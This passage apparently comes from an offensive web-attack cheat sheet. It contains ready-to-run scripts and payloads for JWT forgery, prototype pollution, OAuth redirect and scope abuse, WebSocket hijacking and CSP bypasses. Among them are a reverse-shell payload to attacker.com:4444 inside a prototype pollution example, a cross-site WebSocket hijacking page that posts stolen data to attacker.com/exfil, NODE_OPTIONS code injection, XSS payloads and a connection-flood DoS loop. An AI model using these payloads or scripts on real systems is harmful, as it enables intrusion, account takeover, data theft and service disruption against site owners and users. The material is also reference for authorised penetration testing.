payload['role'] = 'admin'
for kid in kid_payloads:
header = self.header.copy()
header['kid'] = kid
# Try signing with empty secret (for /dev/null)
try:
token = jwt.encode(payload, "", algorithm="HS256", headers=header)
print(f"[+] Token with kid={kid}:")
print(f" {token}")
except:
pass
def generate_report(self):
"""Generate full attack report"""
print("\n" + "="*60)
print("JWT ATTACK REPORT")
print("="*60)
self.display_info()
self.none_algorithm_attack()
self.weak_secret_test()
self.kid_manipulation()
print("\n[*] Manual testing recommendations:")
print(" 1. Test token with modified payload")
print(" 2. Try RS256→HS256 confusion if public key available")
print(" 3. Brute force secret with hashcat/john")
print(" 4. Test JKU/X5U header injection if headers present")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <jwt_token>")
sys.exit(1)
attacker = JWTAttacker(sys.argv[1])
attacker.generate_report()
EOF
chmod +x jwt_attacker.py
python3 jwt_attacker.py "eyJ0eXAiOiJKV1QiLCJhbGc..."
Prototype Pollution (JavaScript/Node.js)#
// Prototype Pollution - Critical in Node.js applications
// Detection payload (basic)
{"__proto__": {"polluted": "yes"}}
// After sending, check if pollution worked:
// In Node.js console or via API response:
// console.log({}.polluted) // Should return "yes" if vulnerable
// Attack 1: Property Injection
{
"__proto__": {
"isAdmin": true,
"role": "admin"
}
}
// Attack 2: XSS via Prototype Pollution
{
"__proto__": {
"innerHTML": "<img src=x onerror=alert(1)>"
}
}
// Attack 3: DoS via Prototype Pollution
{
"__proto__": {
"toString": null
}
}
// This breaks toString() for all objects
// Attack 4: RCE via Prototype Pollution (Node.js)
// Pollute process environment variables
{
"__proto__": {
"env": {
"NODE_OPTIONS": "--require /tmp/malicious.js"
}
}
}
// Attack 5: Command Injection via child_process
{
"__proto__": {
"shell": "/bin/bash",
"argv0": "bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"
}
}
// OPSEC: Automated Prototype Pollution testing
cat > prototype_pollution_test.js << 'EOF'
const axios = require('axios');
async function testPrototypePollution(url) {
console.log('[*] Testing for Prototype Pollution');
// Test payloads
const payloads = [
{ "__proto__": { "polluted": "test1" } },
{ "constructor": { "prototype": { "polluted": "test2" } } },
{ "__proto__": { "isAdmin": true } },
{ "__proto__": { "role": "admin" } }
];
for (let payload of payloads) {
try {
console.log(`\n[*] Testing payload: ${JSON.stringify(payload)}`);
const response = await axios.post(url, payload, {
headers: { 'Content-Type': 'application/json' }
});
console.log(`[+] Status: ${response.status}`);
// Check if pollution occurred (send second request)
const checkResponse = await axios.get(url + '/check');
if (checkResponse.data.polluted ||
checkResponse.data.isAdmin ||
checkResponse.data.role === 'admin') {
console.log('[!] VULNERABLE: Prototype Pollution detected!');
console.log(`[!] Polluted properties: ${JSON.stringify(checkResponse.data)}`);
}
} catch (error) {
console.log(`[-] Error: ${error.message}`);
}
}
}
// Usage
const targetUrl = process.argv[2] || 'http://target.com/api/merge';
testPrototypePollution(targetUrl);
EOF
# Alternative Python version
cat > prototype_pollution_test.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
def test_prototype_pollution(url):
"""Test for prototype pollution vulnerabilities"""
print("[*] Testing for Prototype Pollution")
payloads = [
{"__proto__": {"polluted": "test"}},
{"__proto__": {"isAdmin": True}},
{"__proto__": {"role": "admin"}},
{"constructor": {"prototype": {"polluted": "test"}}},
{"__proto__": {"toString": "polluted"}},
]
headers = {'Content-Type': 'application/json'}
for payload in payloads:
print(f"\n[*] Testing payload: {json.dumps(payload)}")
try:
# Send pollution payload
r = requests.post(url, json=payload, headers=headers)
print(f"[+] Status: {r.status_code}")
# Check if pollution worked
check = requests.get(url + '/check')
response_json = check.json() if check.status_code == 200 else {}
if 'polluted' in str(response_json) or \
response_json.get('isAdmin') or \
response_json.get('role') == 'admin':
print("[!] VULNERABLE: Prototype Pollution detected!")
print(f"[!] Response: {json.dumps(response_json, indent=2)}")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url>")
sys.exit(1)
test_prototype_pollution(sys.argv[1])
EOF
chmod +x prototype_pollution_test.py
python3 prototype_pollution_test.py http://target.com/api/merge
OAuth 2.0 / OpenID Connect Attacks#
# OAuth 2.0 Attack Vectors
# Attack 1: Redirect URI Manipulation
# Original: redirect_uri=https://client.com/callback
# Attacks:
redirect_uri=https://attacker.com/callback
redirect_uri=https://client.com.attacker.com/callback
redirect_uri=https://client.com@attacker.com/callback
redirect_uri=https://client.com#attacker.com
redirect_uri=https://client.com.evil.com
# Open redirect chaining:
redirect_uri=https://client.com/redirect?url=https://attacker.com
# Attack 2: State Parameter Bypass (CSRF)
# If state parameter missing or not validated:
# Step 1: Attacker initiates OAuth flow
https://oauth-provider.com/authorize?client_id=CLIENT&redirect_uri=https://client.com/callback&scope=read
# Step 2: Attacker gets authorization code but doesn't complete
# Step 3: Victim clicks attacker's link with attacker's code
https://client.com/callback?code=ATTACKER_CODE
# Step 4: Victim's account linked to attacker's OAuth account
# Attack 3: Scope Escalation
# Original: scope=read:profile
# Attacks:
scope=read:profile write:profile admin:all
scope=*
scope=read:profile,admin:all
# Attack 4: Client Secret Exposure
# Search for exposed secrets in:
# - JavaScript files
# - Mobile app decompilation
# - GitHub repositories
# - Environment variable leaks
# Common locations:
grep -r "client_secret" /path/to/app/
grep -r "oauth" /path/to/app/ | grep -i "secret"
# Attack 5: Authorization Code Interception
# If redirect_uri uses HTTP instead of HTTPS:
redirect_uri=http://client.com/callback # Intercept via MITM
# Attack 6: Implicit Flow Token Theft (deprecated but still used)
# Tokens in URL fragments can be stolen via:
# - Referer headers
# - Browser history
# - Open redirects
# Example: Force open redirect after OAuth
https://oauth-provider.com/authorize?...&redirect_uri=https://client.com/redirect?next=https://attacker.com
# OPSEC: OAuth vulnerability scanner
cat > oauth_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
from urllib.parse import urlparse, parse_qs, urlencode
import sys
def test_oauth_vulnerabilities(auth_url):
"""Test OAuth 2.0 implementation for vulnerabilities"""
print(f"[*] Testing OAuth endpoint: {auth_url}")
parsed = urlparse(auth_url)
params = parse_qs(parsed.query)
vulnerabilities = []
# Test 1: Redirect URI manipulation
print("\n[*] Test 1: Redirect URI Manipulation")
redirect_tests = [
'https://attacker.com',
'https://evil.com',
'http://localhost',
'https://client.com.evil.com',
]
for redirect in redirect_tests:
test_params = params.copy()
test_params['redirect_uri'] = [redirect]
test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"
try:
r = requests.get(test_url, allow_redirects=False, timeout=5)
if r.status_code in [302, 301]:
location = r.headers.get('Location', '')
if redirect in location:
print(f"[!] VULNERABLE: Redirect accepted to {redirect}")
vulnerabilities.append({
'type': 'open_redirect',
'redirect_uri': redirect
})
except Exception as e:
pass
# Test 2: Check if state parameter present
print("\n[*] Test 2: State Parameter Check")
if 'state' not in params or not params['state']:
print("[!] WARNING: State parameter missing (CSRF vulnerable)")
vulnerabilities.append({
'type': 'missing_state',
'description': 'No CSRF protection via state parameter'
})
else:
print("[+] State parameter present")
# Test 3: Scope escalation
print("\n[*] Test 3: Scope Escalation")
scope_tests = [
'admin',
'admin:all',
'*',
'read write admin'
]
for scope in scope_tests:
test_params = params.copy()
test_params['scope'] = [scope]
test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"
try:
r = requests.get(test_url, allow_redirects=False, timeout=5)
if r.status_code in [200, 302]:
print(f"[+] Scope '{scope}' accepted (Status: {r.status_code})")
vulnerabilities.append({
'type': 'scope_escalation',
'scope': scope
})
except Exception as e:
pass
# Test 4: Check for HTTP redirect_uri
print("\n[*] Test 4: HTTP Redirect URI (Insecure)")
if 'redirect_uri' in params:
redirect_uri = params['redirect_uri'][0]
if redirect_uri.startswith('http://'):
print(f"[!] CRITICAL: Redirect URI uses HTTP: {redirect_uri}")
vulnerabilities.append({
'type': 'http_redirect_uri',
'uri': redirect_uri
})
# Generate report
print("\n" + "="*60)
print("OAUTH VULNERABILITY REPORT")
print("="*60)
if vulnerabilities:
print(f"\n[!] Found {len(vulnerabilities)} vulnerabilities:\n")
for i, vuln in enumerate(vulnerabilities, 1):
print(f"{i}. {vuln['type'].upper()}")
for key, value in vuln.items():
if key != 'type':
print(f" {key}: {value}")
print()
else:
print("\n[+] No obvious vulnerabilities detected")
return vulnerabilities
if name == "main":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <oauth_authorization_url>")
print(f"Example: {sys.argv[0]} 'https://oauth.com/authorize?client_id=123&redirect_uri=...'")
sys.exit(1)
test_oauth_vulnerabilities(sys.argv[1])
EOF
chmod +x oauth_scanner.py
WebSocket Security#
// WebSocket Attack Vectors
// Attack 1: WebSocket Connection Hijacking
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
console.log('[+] WebSocket connected');
// Send malicious payloads
ws.send('{"type":"admin","command":"delete_user","user_id":"victim"}');
ws.send('{"action":"transfer","amount":1000,"to":"attacker"}');
};
ws.onmessage = function(event) {
console.log('[+] Received:', event.data);
};
// Attack 2: CSWSH (Cross-Site WebSocket Hijacking)
// Similar to CSRF but for WebSocket connections
cat > cswsh_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSWSH PoC</title>
</head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="output"></div>
<script>
// Exploit WebSocket that relies on cookies for authentication
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
console.log('[+] WebSocket hijacked!');
document.getElementById('output').innerHTML += '<p>Connected to target WebSocket</p>';
// Send malicious commands
ws.send(JSON.stringify({
action: 'get_messages',
user_id: 'victim'
}));
ws.send(JSON.stringify({
action: 'transfer_funds',
amount: 1000,
to: 'attacker'
}));
};
ws.onmessage = function(event) {
console.log('[+] Data received:', event.data);
// Exfiltrate data
fetch('https://attacker.com/exfil', {
method: 'POST',
body: event.data
});
document.getElementById('output').innerHTML +=
'<p>Received: ' + event.data + '</p>';
};
ws.onerror = function(error) {
console.log('[-] Error:', error);
};
</script>
</body>
</html>
EOF
// Attack 3: WebSocket Message Manipulation
// Intercept and modify WebSocket messages using Burp Suite
// Attack 4: WebSocket Smuggling
// Send oversized or malformed messages
ws.send('A'.repeat(1000000)); // Large payload
ws.send('\x00\x00\x00'); // Null bytes
ws.send('{"incomplete":'); // Malformed JSON
// Attack 5: WebSocket Denial of Service
// Rapid connection/disconnection
for(let i = 0; i < 1000; i++) {
let ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
ws.close();
};
}
// OPSEC: WebSocket security testing tool
cat > websocket_tester.py << 'EOF'
#!/usr/bin/env python3
import asyncio
import websockets
import json
import sys
async def test_websocket_security(uri):
"""Test WebSocket endpoint for security issues"""
print(f"[*] Testing WebSocket: {uri}")
try:
# Test 1: Basic connection
print("\n[*] Test 1: Connection Test")
async with websockets.connect(uri) as ws:
print("[+] Successfully connected")
# Test 2: Authentication bypass
print("\n[*] Test 2: Authentication Bypass")
auth_payloads = [
{"action": "authenticate", "token": "invalid"},
{"action": "authenticate", "user_id": "admin"},
{"action": "get_user_data", "user_id": 1},
{"action": "get_user_data", "user_id": "admin"}
]
for payload in auth_payloads:
await ws.send(json.dumps(payload))
try:
response = await asyncio.wait_for(ws.recv(), timeout=2.0)
print(f"[+] Payload: {payload}")
print(f" Response: {response[:100]}")
except asyncio.TimeoutError:
print(f"[-] Timeout for payload: {payload}")
# Test 3: Message injection
print("\n[*] Test 3: Command Injection")
injection_payloads = [
{"command": "delete_user", "user_id": "victim"},
{"action": "admin_command", "cmd": "shutdown"},
{"type": "sql", "query": "' OR 1=1--"},
{"action": "xss", "data": "<script>alert(1)</script>"}
]
for payload in injection_payloads:
await ws.send(json.dumps(payload))
try:
response = await asyncio.wait_for(ws.recv(), timeout=2.0)
if 'error' not in response.lower():
print(f"[!] Potential vulnerability with: {payload}")
print(f" Response: {response[:100]}")
except asyncio.TimeoutError:
pass
# Test 4: Large payload (DoS)
print("\n[*] Test 4: Large Payload Test")
large_payload = "A" * 1000000
try:
await ws.send(large_payload)
print("[+] Large payload sent (1MB)")
response = await asyncio.wait_for(ws.recv(), timeout=5.0)
print(f"[+] Server handled large payload: {len(response)} bytes")
except Exception as e:
print(f"[!] Large payload caused error: {e}")
except Exception as e:
print(f"[-] Connection error: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <websocket_uri>")
print(f"Example: {sys.argv[0]} wss://target.com/ws")
sys.exit(1)
asyncio.run(test_websocket_security(sys.argv[1]))
EOF
chmod +x websocket_tester.py
Content Security Policy (CSP) Bypasses#
<!-- CSP Bypass Techniques -->
<!-- Bypass 1: JSONP Endpoint Abuse (if whitelisted domain has JSONP) -->
<script src="https://trusted-site.com/jsonp?callback=alert"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>
<script src="https://www.google.com/complete/search?client=chrome&jsonp=alert"></script>
<!-- Bypass 2: Open Redirect on Whitelisted Domain -->
<script src="https://trusted-site.com/redirect?url=https://evil.com/xss.js"></script>
<!-- Bypass 3: Base Tag Injection (if base-uri not restricted) -->
<base href="https://evil.com/">
<script src="/malicious.js"></script>
<!-- Bypass 4: Dangling Markup (if unsafe-inline blocked but quotes not encoded) -->
<img src='https://attacker.com/collect?html=
<!-- Everything after this is sent as query parameter -->
<!-- Bypass 5: AngularJS Sandbox Bypass (if Angular loaded) -->
{{constructor.constructor('alert(1)')()}}
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
{{$on.constructor('alert(1)')()}}
<!-- Angular 1.6+ sandbox escape -->
{{[].pop.constructor('alert(1)')()}}
<!-- Bypass 6: Script Gadgets (if popular libraries loaded) -->
<!-- jQuery CSP bypass -->
<div data-src="xss"><script src="jquery.js"></script></div>
<!-- Prototype.js CSP bypass -->
<form action="javascript:alert(1)"><button>Click</button></form>
<!-- Bypass 7: Nonce Prediction/Reuse -->
<!-- If CSP uses nonce but nonce is predictable or reusable -->
<script nonce="PREDICTED_NONCE">alert(1)</script>
<!-- Bypass 8: 'strict-dynamic' Misuse -->
<!-- If script with valid nonce loads attacker-controlled script -->
<script nonce="VALID_NONCE">
var s = document.createElement('script');
s.src = 'https://evil.com/xss.js';
document.body.appendChild(s); // Allowed due to strict-dynamic
</script>
<!-- Bypass 9: RPO (Relative Path Overwrite) -->
<!-- If CSP allows 'self' and path-relative stylesheets exist -->
http://site.com/page/..%2fstyle.css%0a<script>alert(1)</script>
<!-- Bypass 10: Service Worker CSP Bypass -->
<script>
if ('serviceWorker' in navigator) {
navigator.serviceWorker.register('/sw.js').then(() => {
// Service Worker can modify CSP headers of subsequent requests
});
}
</script>
<!-- Bypass 11: Iframe Injection (if frame-src not restricted) -->
<iframe src="javascript:alert(document.domain)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<!-- Bypass 12: Object/Embed Tag Abuse -->
<object data="data:text/html,<script>alert(1)</script>"></object>
<embed src="data:text/html,<script>alert(1)</script>">
<!-- OPSEC: CSP bypass testing script -->
cat > csp_bypass_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
def test_csp_bypasses(url):
"""Test for CSP bypass vulnerabilities"""
print(f"[*] Testing CSP on {url}")
try:
r = requests.get(url, timeout=5)
csp = r.headers.get('Content-Security-Policy', '')
if not csp:
print("[!] WARNING: No CSP header found")
return
print(f"[*] CSP Policy: {csp}")
print()
# Check for common misconfigurations
issues = []
# Check 1: unsafe-inline
if 'unsafe-inline' in csp:
print("[!] ISSUE: 'unsafe-inline' detected (allows inline scripts)")
issues.append('unsafe-inline')
# Check 2: unsafe-eval
if 'unsafe-eval' in csp:
print("[!] ISSUE: 'unsafe-eval' detected (allows eval())")
issues.append('unsafe-eval')
# Check 3: Wildcard sources
if '*' in csp and 'script-src' in csp:
print("[!] ISSUE: Wildcard in script-src")
issues.append('wildcard-script-src')
# Check 4: data: URI
if 'data:' in csp:
print("[!] ISSUE: 'data:' URI allowed")
issues.append('data-uri')
# Check 5: Missing base-uri
if 'base-uri' not in csp:
print("[!] ISSUE: 'base-uri' not defined (base tag injection possible)")
issues.append('missing-base-uri')
# Check 6: Check for known JSONP endpoints in whitelist
jsonp_domains = [
'google.com',
'googleapis.com',
'gstatic.com',
'accounts.google.com'
]
for domain in jsonp_domains:
if domain in csp:
print(f"[!] ISSUE: Whitelisted domain with JSONP: {domain}")
issues.append(f'jsonp-{domain}')
# Check 7: Nonce without strict-dynamic
if 'nonce-' in csp and 'strict-dynamic' not in csp:
print("[!] INFO: Nonce used without strict-dynamic (potential bypass)")
# Check for reflected content
print("\n[*] Checking for reflected parameters...")
test_params = {
'q': '<script>alert(1)</script>',
'search': '<img src=x onerror=alert(1)>',
'callback': 'alert'
}
for param, payload in test_params.items():
test_url = f"{url}?{param}={payload}"
r_test = requests.get(test_url, timeout=5)
if payload in r_test.text:
print(f"[!] Parameter '{param}' reflected (potential CSP bypass if inline blocked)")
# Generate bypass recommendations
print("\n" + "="*60)
print("CSP BYPASS RECOMMENDATIONS")
print("="*60)
if 'unsafe-inline' in issues:
print("\n1. Direct inline script injection")
print(" <script>alert(1)</script>")
if 'data-uri' in issues:
print("\n2. Data URI bypass")
print(' <script src="data:text/javascript,alert(1)"></script>')
if 'missing-base-uri' in issues:
print("\n3. Base tag injection")
print(' <base href="https://evil.com/">')
if any('jsonp' in i for i in issues):
print("\n4. JSONP endpoint abuse")
print(' <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>')
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url>")
sys.exit(1)
test_csp_bypasses(sys.argv[1])
EOF
chmod +x csp_bypass_tester.py
python3 csp_bypass_tester.py https://target.com